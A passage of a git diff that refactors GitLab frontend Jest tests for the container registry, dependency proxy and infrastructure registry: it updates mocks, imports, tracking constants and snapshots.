${'RubyGems'} - ${'composer'} | ${'Composer'} - ${'debian'} | ${'Debian'} - ${'helm'} | ${'Helm'} - ${'foo'} | ${null} - `(`package type`, ({ packageType, expectedResult }) => { - it(`${packageType} should show as ${expectedResult}`, () => { - expect(getPackageTypeLabel(packageType)).toBe(expectedResult); - }); - }); - }); - - describe('getCommitLink', () => { - it('returns a relative link when isGroup is false', () => { - const link = getCommitLink(packageList[0], false); - - expect(link).toContain('../commit'); - }); - - describe('when isGroup is true', () => { - it('returns an absolute link matching project path', () => { - const mavenPackage = packageList[0]; - const link = getCommitLink(mavenPackage, true); - - expect(link).toContain(`/${mavenPackage.project_path}/commit`); - }); - }); - }); -}); diff --git a/spec/frontend/packages_and_registries/container_registry/explorer/components/details_page/tags_list_spec.js b/spec/frontend/packages_and_registries/container_registry/explorer/components/details_page/tags_list_spec.js index 9a42c82d7e0..56f12e2f0bb 100644 --- a/spec/frontend/packages_and_registries/container_registry/explorer/components/details_page/tags_list_spec.js +++ b/spec/frontend/packages_and_registries/container_registry/explorer/components/details_page/tags_list_spec.js @@ -1,18 +1,16 @@ -import { GlButton, GlKeysetPagination } from '@gitlab/ui'; import { shallowMount, createLocalVue } from '@vue/test-utils'; import { nextTick } from 'vue'; import VueApollo from 'vue-apollo'; import createMockApollo from 'helpers/mock_apollo_helper'; import waitForPromises from 'helpers/wait_for_promises'; +import { stripTypenames } from 'helpers/graphql_helpers'; import EmptyTagsState from '~/packages_and_registries/container_registry/explorer/components/details_page/empty_state.vue'; import component from '~/packages_and_registries/container_registry/explorer/components/details_page/tags_list.vue'; import TagsListRow from 
'~/packages_and_registries/container_registry/explorer/components/details_page/tags_list_row.vue'; import TagsLoader from '~/packages_and_registries/container_registry/explorer/components/details_page/tags_loader.vue'; -import { - TAGS_LIST_TITLE, - REMOVE_TAGS_BUTTON_TITLE, -} from '~/packages_and_registries/container_registry/explorer/constants/index'; +import RegistryList from '~/packages_and_registries/shared/components/registry_list.vue'; import getContainerRepositoryTagsQuery from '~/packages_and_registries/container_registry/explorer/graphql/queries/get_container_repository_tags.query.graphql'; +import { GRAPHQL_PAGE_SIZE } from '~/packages_and_registries/container_registry/explorer/constants/index'; import { tagsMock, imageTagsMock, tagsPageInfo } from '../../mock_data'; const localVue = createLocalVue(); @@ -20,25 +18,20 @@ const localVue = createLocalVue(); describe('Tags List', () => { let wrapper; let apolloProvider; + let resolver; const tags = [...tagsMock]; - const readOnlyTags = tags.map((t) => ({ ...t, canDelete: false })); - const findTagsListRow = () => wrapper.findAll(TagsListRow); - const findDeleteButton = () => wrapper.find(GlButton); - const findListTitle = () => wrapper.find('[data-testid="list-title"]'); - const findPagination = () => wrapper.find(GlKeysetPagination); - const findEmptyState = () => wrapper.find(EmptyTagsState); - const findTagsLoader = () => wrapper.find(TagsLoader); + const findTagsListRow = () => wrapper.findAllComponents(TagsListRow); + const findRegistryList = () => wrapper.findComponent(RegistryList); + const findEmptyState = () => wrapper.findComponent(EmptyTagsState); + const findTagsLoader = () => wrapper.findComponent(TagsLoader); const waitForApolloRequestRender = async () => { await waitForPromises(); await nextTick(); }; - const mountComponent = ({ - propsData = { isMobile: false, id: 1 }, - resolver = jest.fn().mockResolvedValue(imageTagsMock()), - } = {}) => { + const mountComponent = ({ propsData = { 
isMobile: false, id: 1 } } = {}) => { localVue.use(VueApollo); const requestHandlers = [[getContainerRepositoryTagsQuery, resolver]]; @@ -48,6 +41,7 @@ describe('Tags List', () => { localVue, apolloProvider, propsData, + stubs: { RegistryList }, provide() { return { config: {}, @@ -56,99 +50,58 @@ describe('Tags List', () => { }); }; + beforeEach(() => { + resolver = jest.fn().mockResolvedValue(imageTagsMock()); + }); + afterEach(() => { wrapper.destroy(); - wrapper = null; }); - describe('List title', () => { - it('exists', async () => { + describe('registry list', () => { + beforeEach(() => { mountComponent(); - await waitForApolloRequestRender(); - - expect(findListTitle().exists()).toBe(true); + return waitForApolloRequestRender(); }); - it('has the correct text', async () => { - mountComponent(); - - await waitForApolloRequestRender(); - - expect(findListTitle().text()).toBe(TAGS_LIST_TITLE); + it('binds the correct props', () => { + expect(findRegistryList().props()).toMatchObject({ + title: '2 tags', + pagination: stripTypenames(tagsPageInfo), + items: stripTypenames(tags), + idProperty: 'name', + }); }); - }); - describe('delete button', () => { - it.each` - inputTags | isMobile | isVisible - ${tags} | ${false} | ${true} - ${tags} | ${true} | ${false} - ${readOnlyTags} | ${false} | ${false} - ${readOnlyTags} | ${true} | ${false} - `( - 'is $isVisible that delete button exists when tags is $inputTags and isMobile is $isMobile', - async ({ inputTags, isMobile, isVisible }) => { - mountComponent({ - propsData: { tags: inputTags, isMobile, id: 1 }, - resolver: jest.fn().mockResolvedValue(imageTagsMock(inputTags)), + describe('events', () => { + it('prev-page fetch the previous page', () => { + findRegistryList().vm.$emit('prev-page'); + + expect(resolver).toHaveBeenCalledWith({ + first: null, + before: tagsPageInfo.startCursor, + last: GRAPHQL_PAGE_SIZE, + id: '1', }); - - await waitForApolloRequestRender(); - - 
expect(findDeleteButton().exists()).toBe(isVisible); - }, - ); - - it('has the correct text', async () => { - mountComponent(); - - await waitForApolloRequestRender(); - - expect(findDeleteButton().text()).toBe(REMOVE_TAGS_BUTTON_TITLE); - }); - - it('has the correct props', async () => { - mountComponent(); - await waitForApolloRequestRender(); - - expect(findDeleteButton().attributes()).toMatchObject({ - category: 'secondary', - variant: 'danger', }); - }); - - it.each` - disabled | doSelect | buttonDisabled - ${true} | ${false} | ${'true'} - ${true} | ${true} | ${'true'} - ${false} | ${false} | ${'true'} - ${false} | ${true} | ${undefined} - `( - 'is $buttonDisabled that the button is disabled when the component disabled state is $disabled and is $doSelect that the user selected a tag', - async ({ disabled, buttonDisabled, doSelect }) => { - mountComponent({ propsData: { tags, disabled, isMobile: false, id: 1 } }); - - await waitForApolloRequestRender(); - - if (doSelect) { - findTagsListRow().at(0).vm.$emit('select'); - await nextTick(); - } - expect(findDeleteButton().attributes('disabled')).toBe(buttonDisabled); - }, - ); + it('next-page fetch the previous page', () => { + findRegistryList().vm.$emit('next-page'); - it('click event emits a deleted event with selected items', async () => { - mountComponent(); - - await waitForApolloRequestRender(); + expect(resolver).toHaveBeenCalledWith({ + after: tagsPageInfo.endCursor, + first: GRAPHQL_PAGE_SIZE, + id: '1', + }); + }); - findTagsListRow().at(0).vm.$emit('select'); - findDeleteButton().vm.$emit('click'); + it('emits a delete event when list emits delete', () => { + const eventPayload = 'foo'; + findRegistryList().vm.$emit('delete', eventPayload); - expect(wrapper.emitted('delete')[0][0][0].name).toBe(tags[0].name); + expect(wrapper.emitted('delete')).toEqual([[eventPayload]]); + }); }); }); @@ -199,10 +152,12 @@ describe('Tags List', () => { }); describe('when the list of tags is empty', () => { - const 
resolver = jest.fn().mockResolvedValue(imageTagsMock([])); + beforeEach(() => { + resolver = jest.fn().mockResolvedValue(imageTagsMock([])); + }); it('has the empty state', async () => { - mountComponent({ resolver }); + mountComponent(); await waitForApolloRequestRender(); @@ -210,7 +165,7 @@ describe('Tags List', () => { }); it('does not show the loader', async () => { - mountComponent({ resolver }); + mountComponent(); await waitForApolloRequestRender(); @@ -218,76 +173,13 @@ describe('Tags List', () => { }); it('does not show the list', async () => { - mountComponent({ resolver }); - - await waitForApolloRequestRender(); - - expect(findTagsListRow().exists()).toBe(false); - expect(findListTitle().exists()).toBe(false); - }); - }); - - describe('pagination', () => { - it('exists', async () => { - mountComponent(); - - await waitForApolloRequestRender(); - - expect(findPagination().exists()).toBe(true); - }); - - it('is hidden when loading', () => { mountComponent(); - expect(findPagination().exists()).toBe(false); - }); - - it('is hidden when there are no more pages', async () => { - mountComponent({ resolver: jest.fn().mockResolvedValue(imageTagsMock([])) }); - await waitForApolloRequestRender(); - expect(findPagination().exists()).toBe(false); - }); - - it('is wired to the correct pagination props', async () => { - mountComponent(); - - await waitForApolloRequestRender(); - - expect(findPagination().props()).toMatchObject({ - hasNextPage: tagsPageInfo.hasNextPage, - hasPreviousPage: tagsPageInfo.hasPreviousPage, - }); - }); - - it('fetch next page when user clicks next', async () => { - const resolver = jest.fn().mockResolvedValue(imageTagsMock()); - mountComponent({ resolver }); - - await waitForApolloRequestRender(); - - findPagination().vm.$emit('next'); - - expect(resolver).toHaveBeenCalledWith( - expect.objectContaining({ after: tagsPageInfo.endCursor }), - ); - }); - - it('fetch previous page when user clicks prev', async () => { - const resolver = 
jest.fn().mockResolvedValue(imageTagsMock()); - mountComponent({ resolver }); - - await waitForApolloRequestRender(); - - findPagination().vm.$emit('prev'); - - expect(resolver).toHaveBeenCalledWith( - expect.objectContaining({ first: null, before: tagsPageInfo.startCursor }), - ); + expect(findRegistryList().exists()).toBe(false); }); }); - describe('loading state', () => { it.each` isImageLoading | queryExecuting | loadingVisible @@ -306,8 +198,6 @@ describe('Tags List', () => { expect(findTagsLoader().exists()).toBe(loadingVisible); expect(findTagsListRow().exists()).toBe(!loadingVisible); - expect(findListTitle().exists()).toBe(!loadingVisible); - expect(findPagination().exists()).toBe(!loadingVisible); }, ); }); diff --git a/spec/frontend/packages_and_registries/container_registry/explorer/components/list_page/__snapshots__/project_empty_state_spec.js.snap b/spec/frontend/packages_and_registries/container_registry/explorer/components/list_page/__snapshots__/project_empty_state_spec.js.snap index 46b07b4c2d6..4b52e84d1a6 100644 --- a/spec/frontend/packages_and_registries/container_registry/explorer/components/list_page/__snapshots__/project_empty_state_spec.js.snap +++ b/spec/frontend/packages_and_registries/container_registry/explorer/components/list_page/__snapshots__/project_empty_state_spec.js.snap @@ -36,6 +36,7 @@ exports[`Registry Project Empty state to match the default snapshot 1`] = ` <gl-form-input-group-stub class="gl-mb-4" + inputclass="" predefinedoptions="[object Object]" value="" > @@ -57,6 +58,7 @@ exports[`Registry Project Empty state to match the default snapshot 1`] = ` <gl-form-input-group-stub class="gl-mb-4" + inputclass="" predefinedoptions="[object Object]" value="" > @@ -69,6 +71,7 @@ exports[`Registry Project Empty state to match the default snapshot 1`] = ` </gl-form-input-group-stub> <gl-form-input-group-stub + inputclass="" predefinedoptions="[object Object]" value="" > diff --git 
a/spec/frontend/packages_and_registries/container_registry/explorer/mock_data.js b/spec/frontend/packages_and_registries/container_registry/explorer/mock_data.js index 6a835a28807..16625d913a5 100644 --- a/spec/frontend/packages_and_registries/container_registry/explorer/mock_data.js +++ b/spec/frontend/packages_and_registries/container_registry/explorer/mock_data.js @@ -37,6 +37,7 @@ export const graphQLImageListMock = { data: { project: { __typename: 'Project', + id: '1', containerRepositoriesCount: 2, containerRepositories: { __typename: 'ContainerRepositoryConnection', @@ -51,6 +52,7 @@ export const graphQLEmptyImageListMock = { data: { project: { __typename: 'Project', + id: '1', containerRepositoriesCount: 2, containerRepositories: { __typename: 'ContainerRepositoryConnection', @@ -65,6 +67,7 @@ export const graphQLEmptyGroupImageListMock = { data: { group: { __typename: 'Group', + id: '1', containerRepositoriesCount: 2, containerRepositories: { __typename: 'ContainerRepositoryConnection', @@ -120,6 +123,7 @@ export const containerRepositoryMock = { project: { visibility: 'public', path: 'gitlab-test', + id: '1', containerExpirationPolicy: { enabled: false, nextRunAt: '2020-11-27T08:59:27Z', @@ -167,6 +171,7 @@ export const imageTagsMock = (nodes = tagsMock) => ({ data: { containerRepository: { id: containerRepositoryMock.id, + tagsCount: nodes.length, tags: { nodes, pageInfo: { ...tagsPageInfo }, @@ -191,7 +196,7 @@ export const graphQLImageDetailsMock = (override) => ({ data: { containerRepository: { ...containerRepositoryMock, - + tagsCount: tagsMock.length, tags: { nodes: tagsMock, pageInfo: { ...tagsPageInfo }, @@ -242,6 +247,7 @@ export const dockerCommands = { export const graphQLProjectImageRepositoriesDetailsMock = { data: { project: { + id: '1', containerRepositories: { nodes: [ { diff --git a/spec/frontend/packages_and_registries/container_registry/explorer/pages/details_spec.js 
b/spec/frontend/packages_and_registries/container_registry/explorer/pages/details_spec.js index adc9a64e5c9..9b821ba8ef3 100644 --- a/spec/frontend/packages_and_registries/container_registry/explorer/pages/details_spec.js +++ b/spec/frontend/packages_and_registries/container_registry/explorer/pages/details_spec.js @@ -1,6 +1,7 @@ import { GlKeysetPagination } from '@gitlab/ui'; import { shallowMount, createLocalVue } from '@vue/test-utils'; import VueApollo from 'vue-apollo'; +import { nextTick } from 'vue'; import createMockApollo from 'helpers/mock_apollo_helper'; import waitForPromises from 'helpers/wait_for_promises'; import axios from '~/lib/utils/axios_utils'; @@ -22,6 +23,7 @@ import { } from '~/packages_and_registries/container_registry/explorer/constants'; import deleteContainerRepositoryTagsMutation from '~/packages_and_registries/container_registry/explorer/graphql/mutations/delete_container_repository_tags.mutation.graphql'; import getContainerRepositoryDetailsQuery from '~/packages_and_registries/container_registry/explorer/graphql/queries/get_container_repository_details.query.graphql'; +import getContainerRepositoryTagsQuery from '~/packages_and_registries/container_registry/explorer/graphql/queries/get_container_repository_tags.query.graphql'; import component from '~/packages_and_registries/container_registry/explorer/pages/details.vue'; import Tracking from '~/tracking'; @@ -32,6 +34,7 @@ import { containerRepositoryMock, graphQLEmptyImageDetailsMock, tagsMock, + imageTagsMock, } from '../mock_data'; import { DeleteModal } from '../stubs'; @@ -67,12 +70,13 @@ describe('Details Page', () => { const waitForApolloRequestRender = async () => { await waitForPromises(); - await wrapper.vm.$nextTick(); + await nextTick(); }; const mountComponent = ({ resolver = jest.fn().mockResolvedValue(graphQLImageDetailsMock()), mutationResolver = jest.fn().mockResolvedValue(graphQLDeleteImageRepositoryTagsMock), + tagsResolver = 
jest.fn().mockResolvedValue(graphQLImageDetailsMock(imageTagsMock)), options, config = {}, } = {}) => { @@ -81,6 +85,7 @@ describe('Details Page', () => { const requestHandlers = [ [getContainerRepositoryDetailsQuery, resolver], [deleteContainerRepositoryTagsMutation, mutationResolver], + [getContainerRepositoryTagsQuery, tagsResolver], ]; apolloProvider = createMockApollo(requestHandlers); @@ -242,38 +247,49 @@ describe('Details Page', () => { describe('confirmDelete event', () => { let mutationResolver; + let tagsResolver; beforeEach(() => { mutationResolver = jest.fn().mockResolvedValue(graphQLDeleteImageRepositoryTagsMock); - mountComponent({ mutationResolver }); + tagsResolver = jest.fn().mockResolvedValue(graphQLImageDetailsMock(imageTagsMock)); + mountComponent({ mutationResolver, tagsResolver }); return waitForApolloRequestRender(); }); + describe('when one item is selected to be deleted', () => { - it('calls apollo mutation with the right parameters', async () => { + it('calls apollo mutation with the right parameters and refetches the tags list query', async () => { findTagsList().vm.$emit('delete', [cleanTags[0]]); - await wrapper.vm.$nextTick(); + await nextTick(); findDeleteModal().vm.$emit('confirmDelete'); expect(mutationResolver).toHaveBeenCalledWith( expect.objectContaining({ tagNames: [cleanTags[0].name] }), ); + + await waitForPromises(); + + expect(tagsResolver).toHaveBeenCalled(); }); }); describe('when more than one item is selected to be deleted', () => { - it('calls apollo mutation with the right parameters', async () => { + it('calls apollo mutation with the right parameters and refetches the tags list query', async () => { findTagsList().vm.$emit('delete', tagsMock); - await wrapper.vm.$nextTick(); + await nextTick(); findDeleteModal().vm.$emit('confirmDelete'); expect(mutationResolver).toHaveBeenCalledWith( expect.objectContaining({ tagNames: tagsMock.map((t) => t.name) }), ); + + await waitForPromises(); + + 
expect(tagsResolver).toHaveBeenCalled(); }); }); }); @@ -382,7 +398,7 @@ describe('Details Page', () => { findPartialCleanupAlert().vm.$emit('dismiss'); - await wrapper.vm.$nextTick(); + await nextTick(); expect(axios.post).toHaveBeenCalledWith(config.userCalloutsPath, { feature_name: config.userCalloutId, @@ -472,7 +488,7 @@ describe('Details Page', () => { await waitForApolloRequestRender(); findDetailsHeader().vm.$emit('delete'); - await wrapper.vm.$nextTick(); + await nextTick(); }; it('on delete event it deletes the image', async () => { @@ -497,13 +513,13 @@ describe('Details Page', () => { findDeleteImage().vm.$emit('start'); - await wrapper.vm.$nextTick(); + await nextTick(); expect(findTagsLoader().exists()).toBe(true); findDeleteImage().vm.$emit('end'); - await wrapper.vm.$nextTick(); + await nextTick(); expect(findTagsLoader().exists()).toBe(false); }); @@ -513,7 +529,7 @@ describe('Details Page', () => { findDeleteImage().vm.$emit('error'); - await wrapper.vm.$nextTick(); + await nextTick(); expect(findDeleteAlert().props('deleteAlertType')).toBe(ALERT_DANGER_IMAGE); }); diff --git a/spec/frontend/packages_and_registries/dependency_proxy/app_spec.js b/spec/frontend/packages_and_registries/dependency_proxy/app_spec.js index 625f00a8666..44a7186904d 100644 --- a/spec/frontend/packages_and_registries/dependency_proxy/app_spec.js +++ b/spec/frontend/packages_and_registries/dependency_proxy/app_spec.js @@ -54,7 +54,6 @@ describe('DependencyProxyApp', () => { } const findProxyNotAvailableAlert = () => wrapper.findByTestId('proxy-not-available'); - const findProxyDisabledAlert = () => wrapper.findByTestId('proxy-disabled'); const findClipBoardButton = () => wrapper.findComponent(ClipboardButton); const findFormGroup = () => wrapper.findComponent(GlFormGroup); const findFormInputGroup = () => wrapper.findComponent(GlFormInputGroup); @@ -219,28 +218,6 @@ describe('DependencyProxyApp', () => { }); }); }); - - describe('when the dependency proxy is disabled', () 
=> { - beforeEach(() => { - resolver = jest - .fn() - .mockResolvedValue(proxyDetailsQuery({ extendSettings: { enabled: false } })); - createComponent(); - return waitForPromises(); - }); - - it('does not show the main area', () => { - expect(findMainArea().exists()).toBe(false); - }); - - it('does not show the loader', () => { - expect(findSkeletonLoader().exists()).toBe(false); - }); - - it('shows a proxy disabled alert', () => { - expect(findProxyDisabledAlert().text()).toBe(DependencyProxyApp.i18n.proxyDisabledText); - }); - }); }); }); }); diff --git a/spec/frontend/packages_and_registries/dependency_proxy/mock_data.js b/spec/frontend/packages_and_registries/dependency_proxy/mock_data.js index 8bad22b5287..2aa427bc6af 100644 --- a/spec/frontend/packages_and_registries/dependency_proxy/mock_data.js +++ b/spec/frontend/packages_and_registries/dependency_proxy/mock_data.js @@ -8,8 +8,8 @@ export const proxyData = () => ({ export const proxySettings = (extend = {}) => ({ enabled: true, ...extend }); export const proxyManifests = () => [ - { createdAt: '2021-09-22T09:45:28Z', imageName: 'alpine:latest' }, - { createdAt: '2021-09-21T09:45:28Z', imageName: 'alpine:stable' }, + { id: 'proxy-1', createdAt: '2021-09-22T09:45:28Z', imageName: 'alpine:latest' }, + { id: 'proxy-2', createdAt: '2021-09-21T09:45:28Z', imageName: 'alpine:stable' }, ]; export const pagination = (extend) => ({ @@ -26,6 +26,7 @@ export const proxyDetailsQuery = ({ extendSettings = {}, extend } = {}) => ({ group: { ...proxyData(), __typename: 'Group', + id: '1', dependencyProxySetting: { ...proxySettings(extendSettings), __typename: 'DependencyProxySetting', diff --git a/spec/frontend/packages_and_registries/infrastructure_registry/components/details/components/app_spec.js b/spec/frontend/packages_and_registries/infrastructure_registry/components/details/components/app_spec.js index c7c10cef504..2868af84181 100644 --- 
a/spec/frontend/packages_and_registries/infrastructure_registry/components/details/components/app_spec.js +++ b/spec/frontend/packages_and_registries/infrastructure_registry/components/details/components/app_spec.js @@ -9,15 +9,15 @@ import PackagesApp from '~/packages_and_registries/infrastructure_registry/detai import PackageFiles from '~/packages_and_registries/infrastructure_registry/details/components/package_files.vue'; import PackageHistory from '~/packages_and_registries/infrastructure_registry/details/components/package_history.vue'; import * as getters from '~/packages_and_registries/infrastructure_registry/details/store/getters'; -import PackageListRow from '~/packages/shared/components/package_list_row.vue'; -import PackagesListLoader from '~/packages/shared/components/packages_list_loader.vue'; -import { TrackingActions } from '~/packages/shared/constants'; -import * as SharedUtils from '~/packages/shared/utils'; +import PackageListRow from '~/packages_and_registries/infrastructure_registry/shared/package_list_row.vue'; +import PackagesListLoader from '~/packages_and_registries/shared/components/packages_list_loader.vue'; +import { TRACKING_ACTIONS } from '~/packages_and_registries/shared/constants'; +import { TRACK_CATEGORY } from '~/packages_and_registries/infrastructure_registry/shared/constants'; import TerraformTitle from '~/packages_and_registries/infrastructure_registry/details/components/details_title.vue'; import TerraformInstallation from '~/packages_and_registries/infrastructure_registry/details/components/terraform_installation.vue'; import Tracking from '~/tracking'; -import { mavenPackage, mavenFiles, npmPackage } from 'jest/packages/mock_data'; +import { mavenPackage, mavenFiles, npmPackage } from '../../mock_data'; const localVue = createLocalVue(); localVue.use(Vuex); @@ -232,87 +232,78 @@ describe('PackagesApp', () => { describe('tracking', () => { let eventSpy; - let utilSpy; - const category = 'foo'; beforeEach(() => { eventSpy = 
jest.spyOn(Tracking, 'event'); - utilSpy = jest.spyOn(SharedUtils, 'packageTypeToTrackCategory').mockReturnValue(category); }); - it('tracking category calls packageTypeToTrackCategory', () => { - createComponent({ packageEntity: npmPackage }); - expect(wrapper.vm.tracking.category).toBe(category); - expect(utilSpy).toHaveBeenCalledWith('npm'); - }); - - it(`delete button on delete modal call event with ${TrackingActions.DELETE_PACKAGE}`, () => { + it(`delete button on delete modal call event with ${TRACKING_ACTIONS.DELETE_PACKAGE}`, () => { createComponent({ packageEntity: npmPackage }); findDeleteModal().vm.$emit('primary'); expect(eventSpy).toHaveBeenCalledWith( - category, - TrackingActions.DELETE_PACKAGE, + TRACK_CATEGORY, + TRACKING_ACTIONS.DELETE_PACKAGE, expect.any(Object), ); }); - it(`canceling a package deletion tracks ${TrackingActions.CANCEL_DELETE_PACKAGE}`, () => { + it(`canceling a package deletion tracks ${TRACKING_ACTIONS.CANCEL_DELETE_PACKAGE}`, () => { createComponent({ packageEntity: npmPackage }); findDeleteModal().vm.$emit('canceled'); expect(eventSpy).toHaveBeenCalledWith( - category, - TrackingActions.CANCEL_DELETE_PACKAGE, + TRACK_CATEGORY, + TRACKING_ACTIONS.CANCEL_DELETE_PACKAGE, expect.any(Object), ); }); - it(`request a file deletion tracks ${TrackingActions.REQUEST_DELETE_PACKAGE_FILE}`, () => { + it(`request a file deletion tracks ${TRACKING_ACTIONS.REQUEST_DELETE_PACKAGE_FILE}`, () => { createComponent({ packageEntity: npmPackage }); findPackageFiles().vm.$emit('delete-file', mavenFiles[0]); expect(eventSpy).toHaveBeenCalledWith( - category, - TrackingActions.REQUEST_DELETE_PACKAGE_FILE, + TRACK_CATEGORY, + TRACKING_ACTIONS.REQUEST_DELETE_PACKAGE_FILE, expect.any(Object), ); }); - it(`confirming a file deletion tracks ${TrackingActions.DELETE_PACKAGE_FILE}`, () => { + it(`confirming a file deletion tracks ${TRACKING_ACTIONS.DELETE_PACKAGE_FILE}`, () => { createComponent({ packageEntity: npmPackage }); 
findPackageFiles().vm.$emit('delete-file', npmPackage); findDeleteFileModal().vm.$emit('primary'); expect(eventSpy).toHaveBeenCalledWith( - category, - TrackingActions.REQUEST_DELETE_PACKAGE_FILE, + TRACK_CATEGORY, + TRACKING_ACTIONS.REQUEST_DELETE_PACKAGE_FILE, expect.any(Object), ); }); - it(`canceling a file deletion tracks ${TrackingActions.CANCEL_DELETE_PACKAGE_FILE}`, () => { + it(`canceling a file deletion tracks ${TRACKING_ACTIONS.CANCEL_DELETE_PACKAGE_FILE}`, () => { createComponent({ packageEntity: npmPackage }); findPackageFiles().vm.$emit('delete-file', npmPackage); findDeleteFileModal().vm.$emit('canceled'); expect(eventSpy).toHaveBeenCalledWith( - category, - TrackingActions.CANCEL_DELETE_PACKAGE_FILE, + TRACK_CATEGORY, + TRACKING_ACTIONS.CANCEL_DELETE_PACKAGE_FILE, expect.any(Object), ); }); - it(`file download link call event with ${TrackingActions.PULL_PACKAGE}`, () => { + it(`file download link call event with ${TRACKING_ACTIONS.PULL_PACKAGE}`, () => { createComponent({ packageEntity: npmPackage }); findPackageFiles().vm.$emit('download-file'); expect(eventSpy).toHaveBeenCalledWith( - category, - TrackingActions.PULL_PACKAGE, + TRACK_CATEGORY, + TRACKING_ACTIONS.PULL_PACKAGE, expect.any(Object), ); }); diff --git a/spec/frontend/packages_and_registries/infrastructure_registry/components/details/components/details_title_spec.js b/spec/frontend/packages_and_registries/infrastructure_registry/components/details/components/details_title_spec.js index a012ec4ab05..24bd80ba80c 100644 --- a/spec/frontend/packages_and_registries/infrastructure_registry/components/details/components/details_title_spec.js +++ b/spec/frontend/packages_and_registries/infrastructure_registry/components/details/components/details_title_spec.js @@ -1,8 +1,8 @@ import { shallowMount, createLocalVue } from '@vue/test-utils'; import Vuex from 'vuex'; -import { terraformModule, mavenFiles, npmPackage } from 'jest/packages/mock_data'; import component from 
'~/packages_and_registries/infrastructure_registry/details/components/details_title.vue'; import TitleArea from '~/vue_shared/components/registry/title_area.vue'; +import { terraformModule, mavenFiles, npmPackage } from '../../mock_data'; const localVue = createLocalVue(); localVue.use(Vuex); diff --git a/spec/frontend/packages_and_registries/infrastructure_registry/components/details/components/package_files_spec.js b/spec/frontend/packages_and_registries/infrastructure_registry/components/details/components/package_files_spec.js index 0c5aa30223b..6b6c33b7561 100644 --- a/spec/frontend/packages_and_registries/infrastructure_registry/components/details/components/package_files_spec.js +++ b/spec/frontend/packages_and_registries/infrastructure_registry/components/details/components/package_files_spec.js @@ -6,7 +6,7 @@ import component from '~/packages_and_registries/infrastructure_registry/details import FileIcon from '~/vue_shared/components/file_icon.vue'; import TimeAgoTooltip from '~/vue_shared/components/time_ago_tooltip.vue'; -import { npmFiles, mavenFiles } from 'jest/packages/mock_data'; +import { npmFiles, mavenFiles } from '../../mock_data'; describe('Package Files', () => { let wrapper; diff --git a/spec/frontend/packages_and_registries/infrastructure_registry/components/details/components/package_history_spec.js b/spec/frontend/packages_and_registries/infrastructure_registry/components/details/components/package_history_spec.js index 4987af9f5b0..f10f05f4a0d 100644 --- a/spec/frontend/packages_and_registries/infrastructure_registry/components/details/components/package_history_spec.js +++ b/spec/frontend/packages_and_registries/infrastructure_registry/components/details/components/package_history_spec.js @@ -6,7 +6,7 @@ import { HISTORY_PIPELINES_LIMIT } from '~/packages_and_registries/shared/consta import HistoryItem from '~/vue_shared/components/registry/history_item.vue'; import TimeAgoTooltip from '~/vue_shared/components/time_ago_tooltip.vue'; 
-import { mavenPackage, mockPipelineInfo } from 'jest/packages/mock_data'; +import { mavenPackage, mockPipelineInfo } from '../../mock_data'; describe('Package History', () => { let wrapper; diff --git a/spec/frontend/packages_and_registries/infrastructure_registry/components/details/components/terraform_installation_spec.js b/spec/frontend/packages_and_registries/infrastructure_registry/components/details/components/terraform_installation_spec.js index c26784a4b75..6ff4a4c51ef 100644 --- a/spec/frontend/packages_and_registries/infrastructure_registry/components/details/components/terraform_installation_spec.js +++ b/spec/frontend/packages_and_registries/infrastructure_registry/components/details/components/terraform_installation_spec.js @@ -1,8 +1,8 @@ import { shallowMount, createLocalVue } from '@vue/test-utils'; import Vuex from 'vuex'; -import { terraformModule as packageEntity } from 'jest/packages/mock_data'; import TerraformInstallation from '~/packages_and_registries/infrastructure_registry/details/components/terraform_installation.vue'; import CodeInstructions from '~/vue_shared/components/registry/code_instruction.vue'; +import { terraformModule as packageEntity } from '../../mock_data'; const localVue = createLocalVue(); localVue.use(Vuex); diff --git a/spec/frontend/packages_and_registries/infrastructure_registry/components/details/store/actions_spec.js b/spec/frontend/packages_and_registries/infrastructure_registry/components/details/store/actions_spec.js index 61fa69c2f7a..b9383d6c38c 100644 --- a/spec/frontend/packages_and_registries/infrastructure_registry/components/details/store/actions_spec.js +++ b/spec/frontend/packages_and_registries/infrastructure_registry/components/details/store/actions_spec.js @@ -12,8 +12,8 @@ import { DELETE_PACKAGE_ERROR_MESSAGE, DELETE_PACKAGE_FILE_ERROR_MESSAGE, DELETE_PACKAGE_FILE_SUCCESS_MESSAGE, -} from '~/packages/shared/constants'; -import { npmPackage as packageEntity } from '../../../../../packages/mock_data'; 
+} from '~/packages_and_registries/shared/constants'; +import { npmPackage as packageEntity } from '../../mock_data'; jest.mock('~/flash.js'); jest.mock('~/api.js'); diff --git a/spec/frontend/packages_and_registries/infrastructure_registry/components/details/store/getters_spec.js b/spec/frontend/packages_and_registries/infrastructure_registry/components/details/store/getters_spec.js index 8740691a8ee..b14aaa93e1f 100644 --- a/spec/frontend/packages_and_registries/infrastructure_registry/components/details/store/getters_spec.js +++ b/spec/frontend/packages_and_registries/infrastructure_registry/components/details/store/getters_spec.js @@ -3,7 +3,7 @@ import { npmPackage, mockPipelineInfo, mavenPackage as packageWithoutBuildInfo, -} from 'jest/packages/mock_data'; +} from '../../mock_data'; describe('Getters PackageDetails Store', () => { let state; diff --git a/spec/frontend/packages_and_registries/infrastructure_registry/components/details/store/mutations_spec.js b/spec/frontend/packages_and_registries/infrastructure_registry/components/details/store/mutations_spec.js index 6efefea4a14..0f0c84af7da 100644 --- a/spec/frontend/packages_and_registries/infrastructure_registry/components/details/store/mutations_spec.js +++ b/spec/frontend/packages_and_registries/infrastructure_registry/components/details/store/mutations_spec.js @@ -1,6 +1,6 @@ import * as types from '~/packages_and_registries/infrastructure_registry/details/store/mutation_types'; import mutations from '~/packages_and_registries/infrastructure_registry/details/store/mutations'; -import { npmPackage as packageEntity } from 'jest/packages/mock_data'; +import { npmPackage as packageEntity } from '../../mock_data'; describe('Mutations package details Store', () => { let mockState; diff --git a/spec/frontend/packages/list/components/__snapshots__/packages_list_app_spec.js.snap 
